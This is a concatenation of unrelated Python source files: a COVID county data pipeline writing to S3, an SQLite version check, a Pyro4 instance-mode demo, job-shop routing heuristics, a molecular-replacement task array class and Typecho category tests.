    # merge the dataframes (left join on the county_state indexes; the merge
    # materialises the index as 'key_0', restored as the index just below)
    full = full.merge(covid, how='left', left_on=full.index, right_on=covid.index)
    full['county_state'] = full['key_0']
    full.drop(columns='key_0', inplace=True)
    full.set_index('county_state', inplace=True)
    # print the cases and deaths numbers from the new data_set
    print("Think about changing this to be today's numbers:")
    print('cases total on new data set: ', full['confirmed_cases'].sum())
    print('deaths total on new data set: ', full['deaths'].sum())
    # overwrite the covid-per-capita columns
    full['cases_per_100k'] = (full['confirmed_cases'] / full['Population']) * 100_000
    full['deaths_per_100k']= (full['deaths'] / full['Population']) * 100_000
    # export the new dataframe to csv via an in-memory buffer (no temp file)
    csv_buffer = StringIO()
    full.to_csv(csv_buffer)
    s3_resource = boto3.resource('s3')
    s3_resource.Object(bucket, f'{datapath}/updated_snapshot.csv' ).put(Body=csv_buffer.getvalue())
    print('SUCCESS, sending file updated_snapshot.csv to data folder')
    print('\nDaily Snapshot run, commence Machine Learning models\n')
def show_rmse(model_1, model_2, X_test=None, y_test=None):
    '''
    Prints the Root Mean Squared Error of two fitted models.
    Returns 0 on success, 1 on error.
    model_1 / model_2 are fitted estimators exposing a .predict() method
    X_test / y_test are the evaluation features and targets.  They are
    optional for backward compatibility: when omitted, the function falls
    back to module-level globals named X_test / y_test, which is what the
    original implementation relied on implicitly (and which always failed
    with a NameError because no such globals exist in this module).
    '''
    try:
        if X_test is None:
            X_test = globals()['X_test']
        if y_test is None:
            y_test = globals()['y_test']
        print('Root Mean Squared Error of the LR: ', (mean_squared_error(y_test, model_1.predict(X_test)))**(1/2))
        print('Root Mean Squared Error of the GB: ', (mean_squared_error(y_test, model_2.predict(X_test)))**(1/2))
        return 0
    except Exception as e:
        # Report what actually failed instead of swallowing it silently.
        print('An exception occurred:', e)
        return 1
def i_regress(dataframe, features, target, test_size=0.2, n_estimators=100):
    '''
    returns two models, a LinearRegression() and GradientBoostingRegressor(),
    in that order, and also prints out the r2 scores and test RMSE of each
    dataframe is the dataframe being used for the testing
    features is a list of numeric feature column names
    target is a string, the column name from the dataframe of the target
    test_size is a float between 0.0 and 1.0 exclusive used
    in the train_test_split() function
    n_estimators is an int used in the GradientBoostingRegressor()
    '''
    lr = LinearRegression()
    gb = GradientBoostingRegressor(n_estimators=n_estimators)
    X = dataframe[features]
    y = dataframe[target]
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size,
                                                    random_state=42)
    lr.fit(X_train, y_train)
    gb.fit(X_train, y_train)
    print(f'Models successfully built: Target = "{target}"')
    print('*'*30)
    print('Training Scores: ')
    print('LinearRegression         : ', lr.score(X_train, y_train))
    print('GradientBoostingRegressor: ', gb.score(X_train, y_train))
    print('*'*30)
    print('Testing Scores: ')
    print('LinearRegression         : ', lr.score(X_test, y_test))
    print('GradientBoostingRegressor: ', gb.score(X_test, y_test))
    print('*'*30)
    # Bug fix: the original called show_rmse(lr, gb), which looked up
    # X_test/y_test as module-level globals that do not exist, so the RMSE
    # was never printed.  Compute it inline from the local test split.
    print('Root Mean Squared Error of the LR: ', (mean_squared_error(y_test, lr.predict(X_test)))**(1/2))
    print('Root Mean Squared Error of the GB: ', (mean_squared_error(y_test, gb.predict(X_test)))**(1/2))
    print('\n')
    return lr, gb
def run_regression_models(datapath, filename, date, model=False, bucket=BUCKETNAME):
    '''
    Runs Linear Regression models and sends a new 85_col.csv to data storage
    datapath is a string, the relative or absolute path to the data storage
    filename is the name of the daily snapshot file
    date is a string representing the report date
    model is a bool; when True the regression models are actually fitted
    bucket is a string representing the s3 bucket name
    '''
    # call the pandas read_csv() function to create a dataframe
    # NOTE(review): the read path ends in a literal '(unknown)' and the
    # `filename` parameter is never used — this looks like a redacted
    # f-string field; confirm it should be f'.../{filename}'.
    covid_df = pd.read_csv(f's3://{bucket}/{datapath}/(unknown)')
    covid_df.set_index('county_state', inplace=True)
    # use one-hot-encoding to split up the states
    covid_df = pd.get_dummies(columns=['state_abr'], data=covid_df, prefix="", prefix_sep="")
    # create a features list of every numeric (non-object) column
    cols = dict(covid_df.dtypes)
    features = []
    for col in cols:
        if "object" not in str(cols[col]):
            features.append(col)
    # export this dataset for use in the KMeans model:
    csv_buffer = StringIO()
    covid_df[features].to_csv(csv_buffer)
    s3_resource = boto3.resource('s3')
    s3_resource.Object(bucket, f'{datapath}/85_cols.csv').put(Body=csv_buffer.getvalue())
    #commenting out this next bit as changing to an s3 StringIO upload
    #covid_df[features].to_csv(datapath+'85_cols.csv')
    # Remove the target columns from the features list
    features.remove('deaths')
    features.remove('confirmed_cases')
    features.remove('deaths_per_100k')
    features.remove('cases_per_100k')
    targets_list = ['deaths', 'confirmed_cases', 'deaths_per_100k', 'cases_per_100k']
    # If the model input is envoked, run models:
    if model:
        # call the i_regress() function to run the models themselves
        lr_1, gb_1 = i_regress(covid_df, features, target='deaths', test_size=.3, n_estimators=500)
        lr_2, gb_2 = i_regress(covid_df, features, target='confirmed_cases', test_size=.2, n_estimators=200)
        lr_3, gb_3 = i_regress(covid_df, features, target='deaths_per_100k', test_size=.4, n_estimators=500)
        lr_4, gb_4 = i_regress(covid_df, features, target='cases_per_100k', test_size=.35, n_estimators=500)
    ## Begin re-working the dataframe for exporting to Tableau Dashboard
    # Recreate a features list containing only the numerical features
    cols = dict(covid_df.dtypes)
    features = []
    for col in cols:
        if "object" not in str(cols[col]) and col not in targets_list:
            features.append(col)
    # Create a list of the state columns and separate them from the features
    # list.  State dummies are the two-letter columns; 'Q' is excluded so the
    # QMB/QI medicare columns are not mistaken for state abbreviations.
    states = []
    for feat in features:
        if len(feat)==2 and 'Q' not in feat:
            states.append(feat)
    for state in states:
        features.remove(state)
    # create a locations list (identifiers, not predictive features)
    locations = ['latitude', 'longitude', 'fips']
    for loc in locations:
        features.remove(loc)
    print('For re-assessment, wittling down to ', len(features), ' features')
    # If the model input is envoked, run models:
    if model:
        # Run the models again and look for movement
        print('\nRe-running the models using new features\n')
        lr_5, gb_5 = i_regress(covid_df, features, target='deaths', test_size=.3, n_estimators=500)
        lr_6, gb_6 = i_regress(covid_df, features, target='confirmed_cases', test_size=.2, n_estimators=200)
        lr_7, gb_7 = i_regress(covid_df, features, target='deaths_per_100k', test_size=.4, n_estimators=500)
        lr_8, gb_8 = i_regress(covid_df, features, target='cases_per_100k', test_size=.35, n_estimators=500)
    print('\nIn next iteration, this is a good place for a printout of the')
    print('  results of the modeling. Show a graph demonstrating changes\n')
    # Plot a heatmap of the most strongly correlated columns
    strongest = ['deaths_per_100k', 'cases_per_100k', 'pct_white',
                 'pct_black', 'percapita_income', 'median_household_income',
                 'median_family_income']
    plt.figure(figsize=(18, 12))
    #sns.set(font_scale=3)  # font size 2
    sns.heatmap(covid_df[strongest].corr(), cmap='coolwarm', annot=True );
    plt.title('Heatmap of strongest correlations in Model', fontsize=24)
def prep_final_data(datapath, dashboard_datapath, archive_path,
                    filename, date, bucket=BUCKETNAME):
    '''
    Builds the final lower-48 data set and sends it to storage (a dated
    archive copy plus the dashboard's daily_update.csv).
    datapath is a string, the relative or absolute path to the data storage
    dashboard_datapath is a string, the path to where dashboard file is stored
    archive_path is a string, the path to where the archives are stored
    filename is the name of the daily snapshot file to read
    date is a string representing the report date
    bucket is a string representing the name of the s3 bucket
    '''
    print(f'\nBeginning final data set formation for {date}')
    # read in the csv to build dataframe
    # Bug fix: the read path ended in a literal '(unknown)' and the
    # `filename` parameter was never used; read the requested snapshot.
    covid_df = pd.read_csv(f's3://{bucket}/{datapath}/{filename}')
    covid_df.set_index('county_state', inplace=True)
    # columns kept for the dashboard extract (state dummies are dropped)
    keep_cols = ['confirmed_cases', 'deaths', 'latitude', 'longitude', 'fips',
                 'percapita_income', 'median_household_income', 'median_family_income',
                 'number_of_households', 'Population', 'pct_white', 'pct_black',
                 'pct_asian', 'pct_hispanic', 'pct_native_american', 'pct_hawaiian',
                 'QMB_Only', 'QMB_plus_Full', 'SLMB_only', 'SLMB_plus_Full', 'QI',
                 'Other_full', 'Public_Total', 'SNAP_PA_Participation_Persons',
                 'SNAP_NPA_Participation_Persons', 'SNAP_All_Participation_Persons',
                 'SNAP_PA_Participation_Households', 'SNAP_NPA_Participation_Households',
                 'SNAP_All_Participation_Households', 'SNAP_All_Issuance',
                 'deaths_per_100k', 'cases_per_100k', 'jobs_per_100k',
                 'av_household_earnings_per_100k']
    # Bug fix: the original assigned the column selection to df_lower and
    # then immediately overwrote it with the row filter, discarding the
    # column selection entirely.  Filter out Alaska and Hawaii first (the
    # AK/HI dummies only exist on the full frame), then keep the dashboard
    # columns.  .copy() avoids SettingWithCopyWarning on the renames below.
    df_lower = covid_df[(covid_df['AK'] == 0) & (covid_df['HI'] == 0)][keep_cols].copy()
    # clearer demographic column names for the dashboard
    df_lower.rename(columns={
        'pct_black': 'pct_African_American',
        'pct_hispanic': 'pct_Latinx',
        'pct_asian': 'pct_Asian',
        'pct_native_american': 'pct_Native_American',
    }, inplace=True)
    data_set = date + '_cov_soc_eco_lower48.csv'
    # Export a dated copy to the archive store
    dated_buffer = StringIO()
    df_lower.to_csv(dated_buffer)
    s3_resource = boto3.resource('s3')
    s3_resource.Object(bucket, f'{archive_path}/{data_set}').put(Body=dated_buffer.getvalue())
    # Export the daily update used by the dashboard
    csv_buffer = StringIO()
    df_lower.to_csv(csv_buffer)
    s3_resource.Object(bucket, f'{dashboard_datapath}/daily_update.csv').put(Body=csv_buffer.getvalue())
    # print the cases and deaths numbers from the final data_set
    print("Think about changing this to be today's numbers:")
    print('cases total on new data set: ', df_lower['confirmed_cases'].sum())
    print('deaths total on new data set: ', df_lower['deaths'].sum())
    print(f'\nSUCCESS, completed creating {data_set} and exported to {datapath}\n')
| StarcoderdataPython |
1705860 | #!/usr/bin/env python3
# Copyright 2021 BHG [bw.org]
# as of 2021-04-07 bw
import sqlite3
def main():
    """Open an in-memory SQLite database, query the library version and
    print it, then tidy up the cursor and connection."""
    connection = sqlite3.connect(":memory:")
    cursor = connection.cursor()
    cursor.execute("SELECT sqlite_version()")
    (version,) = cursor.fetchone()
    print(f"SQLite version {version}")
    cursor.close()
    connection.close()


if __name__ == "__main__":
    main()
| StarcoderdataPython |
3308783 | from __future__ import print_function
import Pyro4
@Pyro4.behavior(instance_mode="single")
class SingleInstance(object):
    """Demo object: one shared server-side instance serves every call."""

    @Pyro4.expose
    def msg(self, message):
        """Print the received message and return this instance's id."""
        instance_id = id(self)
        print("[%s] %s.msg: %s" % (instance_id, self.__class__.__name__, message))
        return instance_id
@Pyro4.behavior(instance_mode="session", instance_creator=lambda clazz: clazz.create_instance())
class SessionInstance(object):
    """Demo object: one instance per client session, built by the custom
    instance creator so it can capture the correlation id."""

    @Pyro4.expose
    def msg(self, message):
        """Print the received message; return (instance id, correlation id)."""
        instance_id = id(self)
        print("[%s] %s.msg: %s" % (instance_id, self.__class__.__name__, message))
        return instance_id, self.correlation_id

    @classmethod
    def create_instance(cls):
        """Build an instance stamped with the current call's correlation id."""
        instance = cls()
        instance.correlation_id = Pyro4.current_context.correlation_id
        return instance
@Pyro4.behavior(instance_mode="percall")
class PercallInstance(object):
    """Demo object: a fresh server-side instance is created for every call."""

    @Pyro4.expose
    def msg(self, message):
        """Print the received message and return this instance's id."""
        instance_id = id(self)
        print("[%s] %s.msg: %s" % (instance_id, self.__class__.__name__, message))
        return instance_id
if __name__ == "__main__":
    # please make sure a name server is running somewhere first.
    # Register one object per instance mode so clients can compare the
    # returned instance ids across the three behaviors.
    Pyro4.Daemon.serveSimple({
        SingleInstance: "instance.single",
        SessionInstance: "instance.session",
        PercallInstance: "instance.percall"
    }, verbose=True)
| StarcoderdataPython |
3265381 | <filename>FJSP/routing.py
import simpy
import random
import numpy as np
import torch
'''
routing data
job_idx, routing_data, machine_condition, job_pt, job slack, wc_idx, remaining_pt
routing_data = [cumulative_pt, time till available, que_size, cumulative_run_time]
'''
# Benchmark, as the worst possible case
def random_routing(idx, data, job_pt, job_slack, wc_idx, *args):
    """Benchmark rule: pick one of the candidate machines uniformly at
    random (serves as the worst-case baseline)."""
    candidate_count = len(job_pt)
    return np.random.randint(candidate_count)
def TT(idx, data, job_pt, job_slack, wc_idx, *args):
    """Route to the machine with the shortest cumulative processing time
    (column 0 of the per-machine routing data)."""
    best_per_feature = np.argmin(data, axis=0)
    return best_per_feature[0]
def ET(idx, data, job_pt, job_slack, wc_idx, *args):
    """Route to the machine offering the minimum execution time."""
    fastest = np.argmin(job_pt)
    return fastest
def EA(idx, data, job_pt, job_slack, wc_idx, *args):
    """Route to the machine that becomes available the earliest
    (column 1 of the per-machine routing data)."""
    best_per_feature = np.argmin(data, axis=0)
    return best_per_feature[1]
def SQ(idx, data, job_pt, job_slack, wc_idx, *args):
    """Route to the machine with the shortest queue
    (column 2 of the per-machine routing data)."""
    best_per_feature = np.argmin(data, axis=0)
    return best_per_feature[2]
def CT(idx, data, job_pt, job_slack, wc_idx, *args):
    """Route to the machine with the earliest estimated completion time:
    time-till-available (column 1, clipped at zero) plus processing time."""
    availability = np.array(data)[:, 1].clip(0)
    completion_time = availability + np.array(job_pt)
    return completion_time.argmin()
def UT(idx, data, job_pt, job_slack, wc_idx, *args):
    """Route to the machine with the lowest cumulative run time
    (column 3 of the per-machine routing data)."""
    best_per_feature = np.argmin(data, axis=0)
    return best_per_feature[3]
def GP_R1(idx, data, job_pt, job_slack, wc_idx, *args): # genetic programming
    """Machine-priority rule evolved by genetic programming (rule 1).

    After the transpose, data[k] is feature k across machines, following
    the module header: [cumulative_pt, time till available, que_size,
    cumulative_run_time].  Returns the argmin of the evolved priority
    expression.
    """
    data = np.transpose(data)
    # NOTE(review): builtin min() collapses this term to a single scalar
    # (not per-machine), which is then broadcast into `sum` below — confirm
    # the evolved rule really intends min(), not an elementwise np.min.
    sec1 = min(2 * data[2] * np.max([data[2]*job_pt/data[1] , job_pt*data[0]*data[0]], axis=0))
    sec2 = data[2] * job_pt - data[1]
    sum = sec1 + sec2  # NOTE: shadows the builtin `sum` inside this function
    machine_idx = sum.argmin()
    return machine_idx
def GP_R2(idx, data, job_pt, job_slack, wc_idx, *args): # genetic programming
    """Machine-priority rule evolved by genetic programming (rule 2).

    After the transpose, data[k] is feature k across machines.  args[0]
    and args[1] are extra scalar inputs to the evolved expression.
    """
    data = np.transpose(data)
    # NOTE(review): the comma makes sec1 a *tuple* of two arrays, probably a
    # missing np.max/np.min wrapper — verify against the intended formula.
    sec1 = data[2]*data[2], (data[2]+job_pt)*data[2]
    sec2 = np.min([data[1],args[0]/(data[1]*args[0]-1)],axis=0)
    sec3 = -data[2] * args[0]
    sec4 = data[2] * job_pt * np.max([data[0], np.min([data[1],job_pt],axis=0)/(args[0])],axis=0)
    sec5 = np.max([data[2]*data[2], np.ones_like(data[2])*(args[1]-args[0]-1), (data[2]+job_pt)*np.min([data[2],np.ones_like(data[2])*args[1]],axis=0)],axis=0)
    # NOTE(review): NumPy coerces the sec1 tuple to a (2, n) array here, so
    # argmin runs over the flattened result and can return an index >= the
    # number of machines (shadowed builtin `sum` again) — likely a bug.
    sum = sec1 - sec2 * np.max([sec3+sec4/sec5],axis=0)
    machine_idx = sum.argmin()
    return machine_idx
| StarcoderdataPython |
3333945 | <filename>swamp/mr/mrarray.py<gh_stars>1-10
import swamp.mr.mrjob
from swamp.mr.mr import Mr
from pyjob import TaskFactory
class MrArray(Mr):
    """An array of molecular replacement tasks to solve a given structure.
    This class implements data structures to hold all the MR tasks to be executed on a target. It implements functions
    to run and store results of these tasks, contained as instances of :py:obj:`~swamp.mr.mrjob.MrJob` instances.
    :param str id: unique identifier for the :py:obj:`~swamp.mr.mrarray.MrArray` instance
    :param str workdir: working directory where the :py:obj:`~swamp.mr.mrjob.MrJob` instances will be executed
    :param str target_mtz: target's mtz filename
    :param str target_fa: target's fasta filename
    :param str platform: platform where the array of tasks will be executed (default 'sge')
    :param str queue_name: name of the queue where the tasks should be submitted (default None)
    :param str queue_environment: queue environment where the tasks should be submitted (default None)
    :param str phased_mtz: target's mtz filename containing phase information (default None)
    :param int max_concurrent_nprocs: maximum number of concurrent tasks to be executed at any given time (default 1)
    :param int job_kill_time: kill time assigned to :py:obj:`~swamp.mr.mrjob.MrJob` instances (default None)
    :param `~swamp.logger.swamplogger.SwampLogger` logger: logging interface for the MR pipeline (default None)
    :param bool silent: if set to True the logger will not print messages
    :param int max_array_size: set the maximum permitted number of :py:obj:`pyjob.Scripts` instances in a submitted \
    :py:obj:`pyjob.ClusterTask` (default None)
    :ivar list results: A list with the figures of merit obtained after the completion of the pipeline
    :ivar bool error: True if errors have occurred at some point on the pipeline
    :ivar list job_list: A list of the :py:obj:`~swamp.mr.mrjob.MrJob` instances contained on this \
    :py:obj:`~swamp.mr.mrarray.MrArray` instance.
    :ivar dict job_dict: A dictionary of the :py:obj:`~swamp.mr.mrjob.MrJob` instances contained on this \
    :py:obj:`~swamp.mr.mrarray.MrArray` instance. Key corresponds with :py:attr:`swamp.mr.mrjob.MrJob.id`
    :ivar list scripts: List of :py:obj:`pyjob.Scripts` instances to be executed on this \
    :py:obj:`~swamp.mr.mrarray.MrArray` instance
    :ivar str shell_interpreter: Indicates shell interpreter to execute \
    :py:obj:`~swamp.mr.mrjob.MrJob` (default '/bin/bash')
    :example:
    >>> from swamp.mr import MrArray, MrJob
    >>> mr_array = MrArray('<id>', '<workdir>', '<target_mtz>', 'target_fasta>')
    >>> mr_array.add(MrJob('<id>', '<workdir>'))
    >>> print(mr_array)
    MrArray(id="<id>", njobs=1)
    >>> mr_array.run()
    """

    def __init__(self, id, workdir, target_mtz, target_fa, platform="sge", queue_name=None, logger=None,
                 max_array_size=None, queue_environment=None, phased_mtz=None, max_concurrent_nprocs=1,
                 job_kill_time=None, silent=False):
        """Initialise the array; see the class docstring for parameter details."""
        super(MrArray, self).__init__(id, target_fa, target_mtz, workdir, phased_mtz=phased_mtz,
                                      logger=logger, silent=silent)
        # keep the constructor arguments so they can be echoed to the log
        self.init_params = locals()
        self.logger.info(self.pipeline_header.format('MR-ARRAY'))
        self.logger.info(self._inform_args(**self.init_params))
        self.max_concurrent_nprocs = max_concurrent_nprocs
        self.platform = platform
        self.job_kill_time = job_kill_time
        self.queue_name = queue_name
        self.queue_environment = queue_environment
        self.job_list = []
        self.job_dict = {}
        self.scripts = []
        self.shell_interpreter = "/bin/bash"
        self.max_array_size = max_array_size

    def __repr__(self):
        """Short debug representation with the array id and job count."""
        return '{}(id={}, njobs={})'.format(self.__class__.__name__, self.id, len(self.job_list))

    def __contains__(self, id):
        """True if there is a job with the given id"""
        return id in self.job_dict

    def __delitem__(self, id):
        """Remove a job with given id"""
        job = self[id]
        # detach the job from this array before dropping both references
        job.parent_array = None
        self.job_dict.pop(id)
        self.job_list.remove(job)

    def __getitem__(self, id):
        """Return the job with the given id (or list position if id is an int)"""
        if isinstance(id, slice):
            raise NotImplementedError('MrArray does not support slicing yet!')
        elif isinstance(id, int):
            return self.job_list[id]
        else:
            return self.job_dict[id]

    def __iter__(self):
        """Iterate over the job list"""
        for job in self.job_list:
            yield job

    def __len__(self):
        """Return the number of jobs"""
        return len(self.job_list)

    def __reversed__(self):
        """Reversed list of jobs"""
        for job in reversed(self.job_list):
            yield job

    # ------------------ General properties ------------------

    @property
    def cleanup_dir_list(self):
        """List of directories to cleanup after pipeline completion :py:attr:`~swamp.mr.mrarray.MrArray.workdir`"""
        return [self.workdir]

    @property
    def _other_task_info(self):
        """A dictionary with the extra kwargs for :py:obj:`pyjob.TaskFactory`"""
        info = {'directory': self.workdir, 'shell': self.shell_interpreter}
        # local execution caps processes; cluster platforms cap the array size
        if self.platform == 'local':
            info['processes'] = self.max_concurrent_nprocs
        else:
            info['max_array_size'] = self.max_concurrent_nprocs
            if self.queue_environment is not None:
                info['environment'] = self.queue_environment
            if self.queue_name is not None:
                info['queue'] = self.queue_name
            if self.job_kill_time is not None:
                info['runtime'] = self.job_kill_time
        return info

    # ------------------ Methods ------------------

    def add(self, value):
        """Add an instance of :py:obj:`~swamp.mr.mrjob.MrJob` to the array. This includes both the MrJob object \
        and its :py:obj:`pyjob.Script` attribute.

        :argument value: :py:obj:`~swamp.mr.mrjob.MrJob` instance to be added \
        to the array for execution
        :raises TypeError: value is not an instance of :py:obj:`~swamp.mr.mrjob.MrJob`
        :raises ValueError: a :py:obj:`~swamp.mr.mrjob.MrJob` instance with the same \
        :py:attr:`swamp.mr.mrjob.MrJob.id` is already contained in the array
        """
        if not isinstance(value, swamp.mr.mrjob.MrJob):
            raise TypeError('Can only add MrJob instances to an MrArray!')
        if value.id in self:
            raise ValueError("MrJob %s defined twice!" % value)
        self.logger.debug('Registering job %s into the array' % value)
        value.parent_array = self
        self.job_list.append(value)
        self.job_dict[value.id] = value
        self.scripts.append(value.script)

    def run(self, store_results=False):
        """Send the array for execution in the HPC using :py:obj:`pyjob.TaskFactory`

        :argument bool store_results: Not implemented (currently unused)
        """
        self.logger.info("Sending the MR task array to the HPC for execution")
        # split the scripts into chunks of at most max_array_size per task
        if self.max_array_size is not None:
            all_scripts = [tuple(self.scripts[x:x + self.max_array_size]) for x in
                           range(0, len(self.scripts), self.max_array_size)]
        else:
            all_scripts = (self.scripts,)
        for idx, scripts in enumerate(all_scripts, 1):
            self.logger.info('Sending task array %s / %s' % (idx, len(all_scripts)))
            with TaskFactory(self.platform, scripts, **self._other_task_info) as task:
                task.name = 'swamp'
                task.run()
        self.logger.info('All tasks in the array have been completed!')
        self.logger.info('Retrieving results')

    def append_results(self):
        """Append the results obtained in each :py:obj:`~swamp.mr.mrjob.MrJob` instance listed at \
        :py:attr:`~swamp.mr.mrarray.MrArray.job_list` into :py:attr:`~swamp.mr.mr.Mr.results`"""
        for job in self.job_list:
            if job.results is not None:
                self.logger.debug('Recovering results of job %s' % job.id)
                self.results += job.results
            else:
                self.logger.debug('Cannot find any results for job %s' % job.id)
| StarcoderdataPython |
3391077 | <filename>tests/test_category.py
from pytypecho import Category
def test_get_category(te):
    """A fresh Typecho install exposes the stock default category."""
    categories = te.get_categories()
    assert categories
    assert categories[0]['categoryName'] == '默认分类'
def test_new_category(te):
    """Creating a category succeeds and yields the new integer id."""
    new_id = te.new_category(Category(name='Category Name'))
    assert new_id
    assert isinstance(new_id, int)
def test_del_category(te):
    """Deleting an existing category reports success."""
    deleted = te.del_category(2)
    assert deleted
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.